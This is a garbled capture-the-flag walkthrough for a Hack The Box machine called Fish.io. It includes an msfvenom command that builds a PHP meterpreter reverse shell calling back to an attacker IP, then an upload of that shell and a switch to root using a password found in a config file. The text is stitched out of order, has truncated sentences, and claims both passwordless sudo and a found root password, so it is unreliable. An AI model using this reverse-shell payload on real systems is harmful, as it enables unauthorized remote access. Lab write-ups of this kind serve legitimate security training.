Hack Fish.io -

http://10.10.10.15 The webpage appears to be a simple website with a " Contact Us" form. However, upon inspecting the page source, we notice a peculiar comment:

Hack The Box is a popular online platform that offers a variety of virtual machines (VMs) for cybersecurity enthusiasts to practice their hacking skills. One of the boxes available on the platform is Fish.io, a Linux-based VM that simulates a real-world hacking scenario. In this walkthrough, we'll explore the steps to compromise the Fish.io box and gain root access.

In this walkthrough, we demonstrated how to compromise the Fish.io box on Hack The Box. By identifying open ports, enumerating HTTP services, exploiting a web application vulnerability, and leveraging a misconfigured sudo command, we were able to gain root access to the system. This exercise highlights the importance of secure configuration, input validation, and access control in preventing similar attacks. hack fish.io

After exploring the file system, we discover that the sudo command has been configured to allow the fish user to run any command without a password:

cat ~fish/config The file contains a password for the root user. We can now switch to the root user and gain full access to the system: http://10

su root

We create a PHP reverse shell using a tool like msfvenom : In this walkthrough, we'll explore the steps to

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.16 LPORT=4444 -f raw > shell.php Uploading the shell to the server via the "Upload File" feature, we can then trigger the execution of the shell by accessing the uploaded file: